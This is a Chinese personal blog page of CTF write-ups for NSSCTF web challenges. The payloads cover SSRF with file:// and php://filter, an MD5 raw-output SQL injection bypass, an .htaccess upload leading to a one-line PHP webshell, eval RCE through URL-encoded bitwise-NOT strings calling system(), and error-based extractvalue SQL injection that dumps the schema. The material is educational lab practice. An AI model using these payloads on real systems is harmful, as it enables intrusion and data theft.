
<!DOCTYPE html><html lang="en">

<head>
  <meta charset="utf-8">
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.29.1" theme-name="Stellar" theme-version="1.29.1">
  
  <meta name="generator" content="Hexo 6.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  
  <title>NSSCTF刷题2 - Dr4x3zz</title>

  
    <meta name="description" content="# [NISACTF 2022]easyssrf">
<meta property="og:type" content="article">
<meta property="og:title" content="NSSCTF刷题2">
<meta property="og:url" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/index.html">
<meta property="og:site_name" content="Dr4x3zz">
<meta property="og:description" content="# [NISACTF 2022]easyssrf">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a1.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a2.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a3.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a4.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a5.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a6.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a7.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a8.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a9.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b01.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b02.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b03.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b04.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b05.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b06.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b07.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b08.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b09.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b10.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b11.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b12.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b13.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b14.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b15.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b16.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b17.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b18.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b19.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b20.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b21.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b22.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b23.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b24.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b25.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b26.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b27.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b28.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b29.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b30.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b31.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b32.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b33.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b34.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b35.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b36.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b37.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b38.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b39.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b40-17060128515931.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b41.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b42.png">
<meta property="article:published_time" content="2024-01-20T08:25:14.000Z">
<meta property="article:modified_time" content="2024-01-26T08:28:32.000Z">
<meta property="article:author" content="Dr4x3zz">
<meta property="article:tag" content="NSSCTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://dr4x3zz.github.io/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a1.png">
  
  
  
  <meta name="keywords" content="NSSCTF">

  <!-- feed -->
  
    <link rel="alternate" href="/atom.xml" title="Dr4x3zz" type="application/atom+xml">
  

  <link rel="stylesheet" href="/css/main.css?v=1.29.1">

  

  

  
</head>
<body>

<div class="l_body s:aa content tech" id="start" layout="post" ><aside class="l_left"><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="undefined" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main" ff="title">Dr4x3zz</div></a></div></header>

<div class="nav-area">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="Search"></form><div id="search-result"></div><div class="search-no-result">No Results!</div></div>


<nav class="menu dis-select"></nav>
</div>
<div class="widgets">


<widget class="widget-wrapper post-list"><div class="widget-header dis-select"><span class="name">Recent Update</span></div><div class="widget-body fs14"><a class="item title" href="/2024/11/03/MeiYa2022-Individual/"><span class="title">MeiYa2022-Individual</span></a><a class="item title" href="/2024/10/20/MeiYa2023-Individual/"><span class="title">MeiYa2023_Individual</span></a><a class="item title" href="/2024/01/27/buuctf%E5%88%B7%E9%A2%983/"><span class="title">buuctf刷题3</span></a><a class="item title" href="/2024/06/06/Vulnstack%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA/"><span class="title">Vulnstack红日靶场</span></a><a class="item title" href="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/"><span class="title">buuctf刷题5</span></a><a class="item title" href="/2024/02/25/buuctf%E5%88%B7%E9%A2%984/"><span class="title">buuctf刷题4</span></a><a class="item title" href="/2024/02/15/hgame2024-week1-Select-Courses%E6%8A%A2%E8%AF%BE%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99%E5%AD%A6%E4%B9%A0/"><span class="title">hgame2024_week1_Select_Courses抢课脚本编写学习</span></a><a class="item title" href="/2023/04/23/%E9%B2%B2%E9%B9%8F%E6%9D%AFwp/"><span class="title">鲲鹏杯wp</span></a><a class="item title" href="/2024/01/24/buuctf%E5%88%B7%E9%A2%982/"><span class="title">buuctf刷题2</span></a><a class="item title" href="/2023/09/17/NSSCTF%E5%88%B7%E9%A2%981/"><span class="title">NSSCTF刷题1</span></a></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">Home</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">Blog</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/NSSCTF/">NSSCTF</a></div>
<div class="flex-row" id="post-meta"><span class="text created">Posted on: <time datetime="2024-01-20T08:25:14.000Z">2024-01-20</time></span><span class="sep updated"></span><span class="text updated">Updated on: <time datetime="2024-01-26T08:28:32.000Z">2024-01-26</time></span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>NSSCTF刷题2</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><h2 id="nisactf-2022easyssrf"><a class="markdownIt-Anchor" href="#nisactf-2022easyssrf">#</a> [NISACTF 2022]easyssrf</h2>
<span id="more"></span>
<p>进入本题可以看到 curl 一下，输入 url 查询一下就可以回显页面，可以尝试输入 flag，页面告诉我们</p>
<p><code>都说了这里看不了flag。。但是可以看看提示文件：/fl4g</code></p>
<p>输入 /fl4g，让我们尝试其他路径，使用 file 协议读取文件？</p>
<p>file:///fl4g</p>
<p><code>file:///fl4g 的快照如下：</code></p>
<p><code>你应该看看除了index.php，是不是还有个ha1x1ux1u.php</code></p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a1.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a1.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>stristr () 函数用于搜索一个字符串在另一个字符串中第一次出现的位置。(不区别大小写)</p>
<p>语法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stristr(str, search, before_search)</span><br></pre></td></tr></table></figure>
<p>参数</p>
<ul>
<li><strong>str</strong> - 要搜索的字符串</li>
<li><strong>search</strong> - 要搜索的字符串</li>
<li><strong>before_search</strong> - 一个布尔值，默认值为 “false”。如果设置为 “true”，则返回第一次出现搜索参数之前的字符串部分。</li>
</ul>
<p>阅读代码发现 file 被禁用，使用 php 伪协议 php://filter</p>
<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ha1x1ux1u.php?file=php://filter/read=convert.base64-encode/resource=/flag</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a2.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a2.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="a2"></p>
<p>解码得到 flag</p>
<p 95024f7a-aa03-4106-a141-6354f67ddfa5>NSSCTF</p>
<h2 id="nctf-2018签到题"><a class="markdownIt-Anchor" href="#nctf-2018签到题">#</a> [NCTF 2018] 签到题</h2>
<p>bp 抓包访问 index.php，flag 藏在响应头里</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a3.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a3.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<h2 id="bjdctf-2020easy_md5"><a class="markdownIt-Anchor" href="#bjdctf-2020easy_md5">#</a> [BJDCTF 2020]easy_md5</h2>
<p>进入页面只有一个白色查询框，输入 1，可以看见 url 上多了 password=1，可能和注入以及题目说的 md5 结合起来，弱比较？</p>
<p>在响应头看到 hint</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a4.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a4.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>先记录一下 md5 () 这个函数</p>
<p><strong>语法</strong></p>
<p>md5(string, raw)</p>
<table>
<thead>
<tr>
<th><strong>参数</strong></th>
<th>描述</th>
</tr>
</thead>
<tbody>
<tr>
<td>string</td>
<td>必须。要计算的字符串。</td>
</tr>
<tr>
<td>raw</td>
<td>可选。<br>默认不写为 FALSE。32 位 16 进制的字符串<br>TURE。16 位原始二进制格式的字符串</td>
</tr>
</tbody>
</table>
<p>当 raw 为 ture 时，返回的原始二进制不是 0 和 1 构成的，而是’or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 这种</p>
<p>上面这一长串是 ffifdyop 这串字符通过 md5 (,true) 加密后得到的，因为有’or’6… 可以和 hint 中的 sql 语句构成一条常规的 sql 注入从而绕过</p>
<p>测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo md5(&quot;ffifdyop&quot;, true)</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a5.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a5.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>ok 输入 ffifdyop</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a6.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a6.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>查看网页源代码</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a7.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a7.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>这就是一个 md5 弱类型比较，也可以数组绕过，（直接访问 levell14.php 也行？？？？？？。。。。。。）</p>
<p>根据提示 payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url/levell14.php?$a=240610708&amp;&amp;$b=s878926199a</span><br></pre></td></tr></table></figure>
<p>得到新的页面</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a8.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a8.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>md5 无法处理数组，所以使用数组绕过 md5 的比较</p>
<p>post		aram1[]=1&amp;param2[]=2</p>
<p f821cee2-da39-43ae-9727-96b642156034>得到 flag<img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a9.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/a9.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt>NSSCTF</p>
<h2 id="swpuctf-2021-新生赛easyupload30"><a class="markdownIt-Anchor" href="#swpuctf-2021-新生赛easyupload30">#</a> [SWPUCTF 2021 新生赛] easyupload3.0</h2>
<blockquote>
<p>记录一下.htaccess 文件</p>
<p>htaccess 文件是 Apache 服务中的一个配置文件，它负责相关目录下的网页配置。通过 htaccess 文件，可以帮助我们实现：网页 301 重定向、自定义 404 错误页面、改变文件扩展名、允许 / 阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能</p>
<p>.htaccess 文件内容： <code>SetHandler application/x-httpd-php</code>  意思是设置当前目录所有文件都是用 php 解析，那么无论上传任何一个文件，内容只要符合 php 的语言规范，就能够当作 php 代码执行。不符合规则报错</p>
</blockquote>
<p>先上传一个 htaccess 文件，再上传一个包含一句话木马的 jpg 文件</p>
<p>htaccess 文件内容为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;jpg&quot;&gt;</span><br><span class="line">	SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure>
<p>包含一句话木马就是 txt 文件写一段一句话木马然后后缀名改为 jpg 就好了</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b01.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b01.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>上传成功后可以看到路径，蚁剑连接，在 html 文件夹下有 flag.php，里面就是 flag 了</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b02.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b02.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p fae5b878-8cac-4f20-9267-3d44d525354f>NSSCTF</p>
<h2 id="swpuctf-2021-新生赛hardrce"><a class="markdownIt-Anchor" href="#swpuctf-2021-新生赛hardrce">#</a> [SWPUCTF 2021 新生赛] hardrce</h2>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b03.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b03.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>本题是有两个 preg_match 函数去过滤掉一些字符和所有的英文字母，如果传入的 wllm 符合要求就会被 eval 执行</p>
<blockquote>
<p>这里记录一些 <strong>url 编码取反绕过正则表达式</strong> 的一些知识点</p>
<p>1、url 编码取反绕过：就是将 php 代码 url 编码后取反，我们传入参数后服务端进行 url 解码，这时候由于取反后，会解码成不可打印字符，这样我们就会绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo urlencode(&#x27;phpinfo&#x27;);</span><br><span class="line">echo urlencode(~&#x27;phpinfo&#x27;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b04.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b04.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>2、对于 php，形如 (func_name)()，其中 func_name 可以是字符串，会执行这个 func</p>
<p>例如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(~%8F%97%8F%96%91%99%90)()</span><br></pre></td></tr></table></figure>
<p>相当于</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">phpinfo()</span><br></pre></td></tr></table></figure>
</blockquote>
<p>了解完这些我们尝试构建 payload 获取目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">(~%8C%86%8C%8B%9A%92)	# (~&#x27;system&#x27;)</span><br><span class="line">(~%93%8C%DF%D0)			# (~&#x27;ls /&#x27;)</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b05.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b05.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>尝试获取 flllllaaaaaaggggggg 里的内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(~<span class="string">&#x27;system&#x27;</span>);	<span class="comment">#%8C%86%8C%8B%9A%92</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(~<span class="string">&#x27;cat /flllllaaaaaaggggggg&#x27;</span>);	</span><br><span class="line"><span class="comment">#%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>payload 如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);</span><br></pre></td></tr></table></figure>
<p>得到 flag<img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b06.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b06.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p fa9e48b7-5029-43ad-854d-c5de9cd0fb3c>NSSCTF</p>
<h2 id="swpuctf-2021-新生赛error"><a class="markdownIt-Anchor" href="#swpuctf-2021-新生赛error">#</a> [SWPUCTF 2021 新生赛] error</h2>
<p>比较常规的报错注入，熟悉一下 payload</p>
<p>获得当前数据库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; and (select extractvalue(1, concat(&#x27;~&#x27;, (select database())))) -- s</span><br></pre></td></tr></table></figure>
<p><img src alt><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b07.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b07.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="b07"></p>
<p>爆库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; and (select extractvalue(1, concat(&#x27;~&#x27;, (select group_concat(schema_name) from information_schema.schemata)))) -- s</span><br></pre></td></tr></table></figure>
<p>但是单次查询的字符长度受限最好是搭配 substr 限长和控制回显的是哪一部分，本题没用上别的数据库，就不把所有数据库都查出来了</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b08.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b08.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>爆出 test_db 数据库下的所有表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; and (select extractvalue(1, concat(&#x27;~&#x27;, (select group_concat(table_name) from information_schema.tables where table_schema=&#x27;test_db&#x27;)))) -- s</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b09.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b09.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>爆出 test_tb 的所有字段名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; and (select extractvalue(1, concat(&#x27;~&#x27;, (select group_concat(column_name) from information_schema.columns where table_name=&#x27;test_tb&#x27; and table_schema=&#x27;test_db&#x27;)))) -- s</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b10.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b10.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>查询 flag！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; and (select extractvalue(1, concat(&#x27;~&#x27;, (select substr((select flag from test_tb),1,31))))) -- s	#前31位</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b11.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b11.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; and (select extractvalue(1, concat(&#x27;~&#x27;, (select substr((select flag from test_tb),31,62))))) -- s	#剩下的</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b12.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b12.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
